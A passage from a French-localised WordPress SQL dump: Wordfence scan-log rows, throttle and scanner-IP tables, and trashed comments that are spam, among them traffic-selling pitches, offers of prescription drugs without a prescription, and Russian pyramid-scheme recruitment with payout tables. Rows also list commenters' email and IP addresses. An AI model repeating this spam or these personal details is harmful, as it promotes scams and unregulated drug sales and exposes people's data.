(118137, 1492290942.764713, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(118138, 1492320230.730340, 1, 'info', 'Scheduled Wordfence scan starting at Sunday 16th of April 2017 05:23:50 AM'),
(117217, 1491821938.982438, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117218, 1491821938.984399, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117216, 1491821938.981949, 2, 'info', 'Scanned contents of 86 additional files at 26.72 per second'),
(117215, 1491821938.979362, 2, 'info', 'Scanned contents of 86 additional files at 26.74 per second'),
(117214, 1491821937.950023, 2, 'info', 'Scanned contents of 39 additional files at 17.84 per second'),
(117213, 1491821936.857880, 2, 'info', 'Scanned contents of 28 additional files at 25.59 per second'),
(118037, 1492280433.178924, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117212, 1491821935.762637, 2, 'info', 'Starting scan of file contents'),
(118035, 1492280433.175133, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118036, 1492280433.176128, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117993, 1492280419.011346, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117613, 1492072406.591878, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117994, 1492280419.357399, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117995, 1492280419.590116, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117996, 1492280419.928479, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117997, 1492280420.383053, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117998, 1492280421.419171, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117999, 1492280422.608813, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(118000, 1492280423.446765, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(118001, 1492280423.738092, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(118002, 1492280424.164657, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(118003, 1492280424.594735, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(118004, 1492280425.020011, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(118057, 1492290925.040585, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117904, 1492265530.323893, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117898, 1492265528.342211, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117899, 1492265528.643364, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117900, 1492265529.075023, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117901, 1492265529.404778, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117902, 1492265529.557542, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117903, 1492265529.906968, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117064, 1491750769.532131, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117063, 1491750769.531784, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117062, 1491750769.531340, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117819, 1492193120.926257, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117820, 1492193121.593978, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117821, 1492193122.595042, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117822, 1492193123.775098, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117880, 1492265522.310195, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117747, 1492108248.385805, 2, 'info', 'Scanned contents of 56 additional files at 18.35 per second'),
(117823, 1492193124.016753, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117303, 1491886410.891745, 2, 'info', 'Scanned contents of 39 additional files at 18.30 per second'),
(117304, 1491886411.856837, 2, 'info', 'Scanned contents of 86 additional files at 27.78 per second'),
(117305, 1491886411.857229, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117306, 1491886411.858247, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117307, 1491886412.712643, 2, 'info', 'Done host key check.'),
(117308, 1491886412.714655, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117309, 1491886413.590731, 2, 'info', 'Done URL check.'),
(117310, 1491886413.607520, 2, 'info', 'Done file contents scan'),
(117744, 1492108245.332862, 2, 'info', 'Starting scan of file contents'),
(118209, 1492320260.797986, 10, 'info', 'SUM_ENDOK:Scanning for weak passwords'),
(118208, 1492320259.648499, 2, 'info', 'Starting password strength check on 3 users.'),
(117929, 1492265541.056105, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117930, 1492265541.933528, 2, 'info', 'Done URL check.'),
(118006, 1492280425.084668, 10, 'info', 'SUM_ENDOK:Comparing core WordPress files against originals in repository'),
(118005, 1492280425.082622, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117337, 1491886416.197572, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 43639 records in 33 seconds.'),
(117635, 1492072412.242743, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(118168, 1492320248.561467, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117809, 1492193117.391797, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117810, 1492193117.700719, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117811, 1492193118.150278, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117812, 1492193118.559895, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(118167, 1492320248.285222, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(118034, 1492280433.174121, 10, 'info', 'SUM_START:Scanning DNS for unauthorized changes'),
(117206, 1491821934.793681, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(118067, 1492290929.982592, 10, 'info', 'SUM_DISABLED:Skipping theme scan'),
(118033, 1492280433.165086, 10, 'info', 'SUM_ENDOK:Scanning for weak passwords'),
(117537, 1492058773.211522, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117207, 1491821934.849188, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117543, 1492058774.852590, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117542, 1492058774.531758, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(118068, 1492290929.983145, 10, 'info', 'SUM_DISABLED:Skipping plugin scan'),
(118069, 1492290929.988825, 10, 'info', 'SUM_START:Scanning for known malware files'),
(118070, 1492290930.150517, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(118071, 1492290930.322597, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(118072, 1492290930.484467, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(118073, 1492290930.632957, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(118074, 1492290930.794693, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(118075, 1492290930.942165, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(118076, 1492290931.103734, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(118077, 1492290931.355899, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(118078, 1492290931.571112, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(118079, 1492290931.749529, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(118080, 1492290931.991039, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(118081, 1492290932.156280, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(118082, 1492290932.398992, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(118083, 1492290932.552849, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(118084, 1492290932.671374, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117483, 1491988777.619980, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117482, 1491988777.618677, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117780, 1492108252.943672, 1, 'info', '-------------------'),
(117219, 1491821939.856259, 2, 'info', 'Done host key check.'),
(117291, 1491886406.619184, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117292, 1491886406.875923, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117293, 1491886407.266508, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117924, 1492265539.187627, 2, 'info', 'Scanned contents of 39 additional files at 18.18 per second'),
(118191, 1492320256.881443, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(118190, 1492320256.879894, 2, 'info', 'Scanned contents of 86 additional files at 29.29 per second'),
(118189, 1492320255.987609, 2, 'info', 'Scanned contents of 41 additional files at 20.06 per second'),
(118188, 1492320254.983074, 2, 'info', 'Scanned contents of 28 additional files at 26.94 per second'),
(118187, 1492320253.943182, 2, 'info', 'Starting scan of file contents'),
(118186, 1492320253.046651, 10, 'info', 'SUM_START:Scanning files for URLs in Google\'s Safe Browsing List'),
(118185, 1492320253.041850, 10, 'info', 'SUM_START:Scanning file contents for infections and vulnerabilities'),
(118184, 1492320253.013817, 10, 'info', 'SUM_ENDOK:Scanning for known malware files'),
(118183, 1492320253.011604, 10, 'info', 'SUM_ENDOK:Comparing core WordPress files against originals in repository'),
(118182, 1492320253.010510, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(118181, 1492320252.982623, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(118180, 1492320252.660807, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(118179, 1492320252.421174, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(118178, 1492320252.115644, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(116950, 1491702317.190081, 2, 'info', 'Scanned contents of 87 additional files at 29.60 per second'),
(116951, 1491702317.193297, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117547, 1492058776.321400, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117548, 1492058776.783869, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117549, 1492058777.076834, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117550, 1492058777.236704, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117551, 1492058777.449628, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117552, 1492058777.747064, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117553, 1492058778.070060, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117554, 1492058778.951874, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117555, 1492058780.683030, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117556, 1492058781.174504, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117557, 1492058781.382291, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117558, 1492058781.790771, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117074, 1491767380.193700, 1, 'info', 'Scheduled Wordfence scan starting at Sunday 9th of April 2017 07:49:40 PM'),
(117632, 1492072411.726452, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117633, 1492072411.927832, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(118054, 1492290919.294364, 10, 'info', 'SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),
(117516, 1491988782.040066, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(118227, 1493013113.164845, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(118228, 1493013114.066445, 2, 'info', 'Done host key check.'),
(118229, 1493013114.081588, 2, 'info', 'Scanned comment with Author: Elisa Brown Email: leyswgiuz@mrflazu.com Source IP: 81.171.97.125 '),
(117694, 1492072423.958439, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117808, 1492193117.074159, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117448, 1491988761.650291, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117403, 1491943545.677182, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.');

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfThrottleLog`
--

CREATE TABLE `www2_wfThrottleLog` (
  `IP` int(10) UNSIGNED NOT NULL,
  `startTime` int(10) UNSIGNED NOT NULL,
  `endTime` int(10) UNSIGNED NOT NULL,
  `timesThrottled` int(10) UNSIGNED NOT NULL,
  `lastReason` varchar(255) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_wfThrottleLog`
--

INSERT INTO `www2_wfThrottleLog` (`IP`, `startTime`, `endTime`, `timesThrottled`, `lastReason`) VALUES
(1153176390, 1445127994, 1445127994, 1, 'Exceeded the maximum number of page not found errors per minute for a crawler.');

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfVulnScanners`
--

CREATE TABLE `www2_wfVulnScanners` (
  `IP` int(10) UNSIGNED NOT NULL,
  `ctime` int(10) UNSIGNED NOT NULL,
  `hits` int(10) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_wfVulnScanners`
--

INSERT INTO `www2_wfVulnScanners` (`IP`, `ctime`, `hits`) VALUES
(3639891306, 1493024963, 1),
(1247482290, 1494369707, 2),
(844599434, 1496262052, 10),
(3233508538, 1497512350, 1);

-- --------------------------------------------------------

--
-- Structure de la table `www_commentmeta`
--

CREATE TABLE `www_commentmeta` (
  `meta_id` bigint(20) UNSIGNED NOT NULL,
  `comment_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www_commentmeta`
--

INSERT INTO `www_commentmeta` (`meta_id`, `comment_id`, `meta_key`, `meta_value`) VALUES
(1, 17, '_wp_trash_meta_status', '0'),
(2, 17, '_wp_trash_meta_time', '1382883677'),
(3, 16, '_wp_trash_meta_status', '0'),
(4, 16, '_wp_trash_meta_time', '1382883677'),
(5, 15, '_wp_trash_meta_status', '0'),
(6, 15, '_wp_trash_meta_time', '1382883677'),
(7, 14, '_wp_trash_meta_status', '0'),
(8, 14, '_wp_trash_meta_time', '1382883677'),
(9, 13, '_wp_trash_meta_status', '0'),
(10, 13, '_wp_trash_meta_time', '1382883677'),
(11, 12, '_wp_trash_meta_status', '0'),
(12, 12, '_wp_trash_meta_time', '1382883677'),
(13, 11, '_wp_trash_meta_status', '0'),
(14, 11, '_wp_trash_meta_time', '1382883677'),
(15, 10, '_wp_trash_meta_status', '0'),
(16, 10, '_wp_trash_meta_time', '1382883677'),
(17, 9, '_wp_trash_meta_status', '0'),
(18, 9, '_wp_trash_meta_time', '1382883677'),
(19, 8, '_wp_trash_meta_status', '0'),
(20, 8, '_wp_trash_meta_time', '1382883677'),
(21, 7, '_wp_trash_meta_status', '0'),
(22, 7, '_wp_trash_meta_time', '1382883677'),
(23, 6, '_wp_trash_meta_status', '0'),
(24, 6, '_wp_trash_meta_time', '1382883677'),
(25, 5, '_wp_trash_meta_status', '0'),
(26, 5, '_wp_trash_meta_time', '1382883677'),
(27, 4, '_wp_trash_meta_status', '0'),
(28, 4, '_wp_trash_meta_time', '1382883677'),
(29, 3, '_wp_trash_meta_status', '0'),
(30, 3, '_wp_trash_meta_time', '1382883677'),
(31, 2, '_wp_trash_meta_status', '0'),
(32, 2, '_wp_trash_meta_time', '1382883677'),
(33, 1, '_wp_trash_meta_status', '1'),
(34, 1, '_wp_trash_meta_time', '1382883677'),
(35, 20, '_wp_trash_meta_status', '0'),
(36, 20, '_wp_trash_meta_time', '1383293745'),
(37, 19, '_wp_trash_meta_status', '0'),
(38, 19, '_wp_trash_meta_time', '1383293745'),
(39, 18, '_wp_trash_meta_status', '0'),
(40, 18, '_wp_trash_meta_time', '1383293745');

-- --------------------------------------------------------

--
-- Structure de la table `www_comments`
--

CREATE TABLE `www_comments` (
  `comment_ID` bigint(20) UNSIGNED NOT NULL,
  `comment_post_ID` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT '',
  `comment_parent` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `user_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www_comments`
--

INSERT INTO `www_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(1, 1, 'Mr WordPress', '', 'http://wordpress.org/', '', '2013-05-23 18:04:49', '2013-05-23 18:04:49', 'Hi, this is a comment.\nTo delete a comment, just log in and view the post&#039;s comments. There you will have the option to edit or delete them.', 0, 'trash', '', '', 0, 0),
(2, 1, 'Olivia', 'cjqxvyrqt@gmail.com', 'http://nsru.net/048o', '178.32.183.43', '2013-08-07 04:19:52', '2013-08-07 04:19:52', 'You need targeted traffic to your website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their website traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Sign up before it is too late: http://nsru.net/048o', 0, 'trash', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(3, 1, 'Olivia', 'zgxmpkdh@gmail.com', 'http://nsru.net/138e', '178.32.183.43', '2013-08-14 01:15:59', '2013-08-14 01:15:59', 'I came to your page and noticed you could have a lot more visitors. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get traffic from and they let you try their service for free. I managed to get over 300 targetted visitors to day to my website. Visit them today: http://nsru.net/138e', 0, 'trash', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(4, 1, 'Svetlana', 'npyilv@gmail.com', 'http://nsru.net/138e', '178.32.183.43', '2013-08-15 20:03:57', '2013-08-15 20:03:57', 'We have decided to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it needs. Visit us today: http://nsru.net/138e', 0, 'trash', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(5, 1, 'Nicole', 'crqtcl@gmail.com', 'http://nsru.net/188x', '178.33.203.157', '2013-08-19 19:05:39', '2013-08-19 19:05:39', 'We have made the decision to open our POWERFUL and PRIVATE website traffic system to the public for a limited time! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it needs. Visit us today: http://nsru.net/188x', 0, 'trash', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(6, 1, 'Jenny', 'ubfpep@gmail.com', 'http://nsru.net/188x', '178.33.203.157', '2013-08-21 04:26:27', '2013-08-21 04:26:27', 'We have decided to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it needs. Visit us today: http://nsru.net/188x', 0, 'trash', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(7, 1, 'Jennifer', 'ydilcbj@gmail.com', 'http://nsru.net/188x', '178.33.203.157', '2013-08-23 05:32:54', '2013-08-23 05:32:54', 'I discovered your page and noticed you could have a lot more hits. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get traffic from and they let you try the service for free. I managed to get over 300 targetted visitors to day to my site. Visit them today: http://nsru.net/188x', 0, 'trash', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(8, 1, 'Chloie', 'mhixev@gmail.com', 'http://nsru.net/268m', '178.33.203.157', '2013-08-30 04:44:04', '2013-08-30 04:44:04', 'I have found the best kept secret in internet traffic and I want to share it with you. Everyone thinks the best website traffic comes from Google but the real quality visitors comes from paid traffic. The guys that I know that make the high 6 and 7 figures all buy their website traffic. Go here to see the company they shared with me: http://nsru.net/268m', 0, 'trash', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(9, 1, 'Donna', 'faerzcrsm@gmail.com', 'http://nsru.net/019r', '178.33.203.157', '2013-09-02 05:59:01', '2013-09-02 05:59:01', 'I have found the best kept secret in internet visitors and I want to share it with you. Everyone thinks the best website traffic comes from Google but the real quality traffic comes from paid traffic. The guys that I know that make the high 6 and 7 figures all buy their website traffic. Go here to see the company they shared with me: http://nsru.net/019r', 0, 'trash', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(10, 1, 'ovenogema', 'elvorobet@yandex.com', 'http://levitra.ucoz.com/', '89.178.135.40', '2013-09-09 05:17:51', '2013-09-09 05:17:51', 'Get More Info buy levitra no prescription <a href=\"http://levitra.ucoz.com/\" / rel=\"nofollow\">levitra no effect</a>', 0, 'trash', 'Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1', '', 0, 0),
(11, 1, 'Regreegeniomb', 'galina.neznaikina@yandex.com', 'http://light.prosto50.ru/?ref=EJKXD', '95.28.141.16', '2013-10-01 16:18:39', '2013-10-01 16:18:39', 'Сегодня 01.10.2013 открылся новый проект Просто Лайт!!! \r\n \r\nПодробная информация и регистрация: http://light.prosto50.ru/?ref=schemer \r\n \r\nХотите зарабатывать деньги в интернете, но не знаете как? Наверняка Вы мечтаете обрести финансовую свободу? \r\nМы Вам поможем! Кстати, свой первый шаг к успеху Вы уже сделали - Вы на нашем сайте! Теперь Вам осталось решить: \r\nХотите ли Вы зарабатывать РЕАЛЬНЫЕ деньги и быть финансово независимым. Или оставить все как прежде? \r\n \r\nПреимущества проекта: \r\n \r\nВсе расчеты осуществляются через систему QIWI (без процентов и комиссий), только между участниками, что гарантирует \r\nсохранность Ваших денег. Нет ограничения по рефералам на 1 уровне, а следовательно и на уровнях выше может быть любое \r\nколичество рефералов. Нет лимита продаж уровней. Очень удобная короткая матрица и стоимость уровней ниже, что позволяет \r\nбыстро и легко заработать много денег!!! \r\n \r\nОтличия проекта Лайт от Просто50 \r\n \r\nНет ограничения по рефералам на 1 уровне, а следовательно и на уровнях выше может быть любое количество рефералов. \r\nНет лимита продаж уровней. Очень удобная короткая матрица и стоимость уровней ниже, что позволяет быстро и легко \r\nзаработать много денег!!! \r\n \r\nСтоимость уровней: \r\n \r\nУровень	  Цена	     Рефералы \r\n1.	  50 Руб     Неограниченно \r\n2.	  150 Руб    Неограниченно \r\n3.	  300 Руб    Неограниченно \r\n4.	  600 Руб    Неограниченно \r\n5.	  900 Руб    Неограниченно', 0, 'trash', 'Mozilla/5.0 (Windows NT 6.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1', '', 0, 0),
(12, 1, 'Regreegeniomb', 'lina.alina-galckina@yandex.com', 'http://light.prosto50.ru/?ref=EJKXD', '95.27.28.118', '2013-10-08 09:57:45', '2013-10-08 09:57:45', 'Всем привет!!! Открылся новый проект Просто Лайт!!! Этой осенью, исполняется год проекту Просто50. На протяжении всего года в нем приняло участие более 8 тысяч человек, \r\nкоторые улучшили свое материальное положение. Была проведена огромная работа и получен бесценный опыт, которые позволили \r\nразработать инновационный маркетинг, лишенный недостатков обычных матриц, получивший название Лайт. Любители матриц по \r\nдостоинству оценят новый проект Лайт, где стоимость уровней дешевле, а доход больше. Зарабатывать станет еще легче! \r\n \r\nРегистрация тут: http://light.prosto50.ru/?ref=schemer', 0, 'trash', 'Opera/9.80 (Windows NT 6.1; Win64; x64; Edition Yx) Presto/2.12.388 Version/12.11', '', 0, 0),
(13, 1, 'brerThuby', 'angelinamalysheva@yandex.com', 'http://www.pharaoh-mlm.biz/', '128.69.203.51', '2013-10-23 11:06:56', '2013-10-23 11:06:56', 'Запуск нового сайта \"Всевидящее Око\"!!! Добро пожаловать на \"Всевидящее Око\". Этот ресурс посвящён заработку в интернете. Если Вас интересует заработок в интернете, то дочитайте это до конца. \r\n \r\nЗарабатывать деньги с нами проще простого. Для этого Вам просто нужно вступить в наш проект: http://www.pharaoh-mlm.biz/ \r\n \r\nТеперь Вы можете зарабатывать деньги в сети. Приглашая людей на наш ресурс, Вам предоставляется возможность продавать левелы этим людям. Люди которых привели Вы, будут так же приводить людей, которым впоследствии Вы тоже сможете продавать уровни. \r\n \r\nВсе операции с деньгами осуществляются ТОЛЬКО между членами клуба \"Всевидяшее Око\", в денежной системе QIWI, и нигде не хранятся. Классическая матрица операций с деньгами между участниками проекта, позволяет начать зарабатывать деньги уже на первом левеле: \r\n \r\n1.	100 Руб	        4 - чел.	400 Руб \r\n2.	200 Руб	        16 - чел.	3200 Руб \r\n3.	1600 Руб	64 - чел.	102400 Руб \r\n4.	51200 Руб	256 - чел.	13107200 Руб \r\n \r\nПосле подачи заявки на участие, Ваши затраты  на нашем сайте не привысят 100 руб. ВСЕМ УДАЧНЫХ ЗАРАБОТКОВ!!!', 0, 'trash', 'Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.11', '', 0, 0),
(14, 1, 'YARJRIF', 'pipavloff1977@hotmail.com', 'http://tersni.unblog.fr/#14649', '178.151.216.88', '2013-10-24 15:01:46', '2013-10-24 15:01:46', 'prix xenical au maroc\r\nacheter du xenical en ligne\r\nacheter xenical sans ordonnance\r\nprix du xenical en pharmacie\r\n \r\nhttp://dustdi.unblog.fr/#4405 \r\nhttp://promcent.unblog.fr/#4602 \r\nhttp://tersni.unblog.fr/#2501,  orlistat prix \r\nxenical prix discount\r\nxenical vente libre espagne\r\nacheter orlistat 120mg\r\nxenical pas cher france\r\nxenical meilleur prix\r\nprix xenical\r\nxenical en pharmacie\r\nvente xenical en ligne', 0, 'trash', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.162 Safari/535.19', '', 0, 0),
(15, 1, 'PKXUAOF', 'pipavloff1977@hotmail.com', 'http://promcent.unblog.fr/#18035', '178.151.216.88', '2013-10-25 02:17:40', '2013-10-25 02:17:40', 'xenical en belgique\r\nprix du xenical en pharmacie\r\nprix du medicament xenical\r\ncommander xenical en ligne\r\n \r\nhttp://dustdi.unblog.fr/#1428 \r\nhttp://promcent.unblog.fr/#4289 \r\nhttp://tersni.unblog.fr/#1485,  xenical 120 mg \r\norlistat effets secondaires\r\nxenical 120 mg prix\r\nxenical sans ordonnance xenical\r\nprix du xenical en pharmacie france\r\norlistat en vente libre\r\nacheter xenical pas cher\r\nprix orlistat\r\norlistat', 0, 'trash', 'Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.10.289 Version/12.00', '', 0, 0),
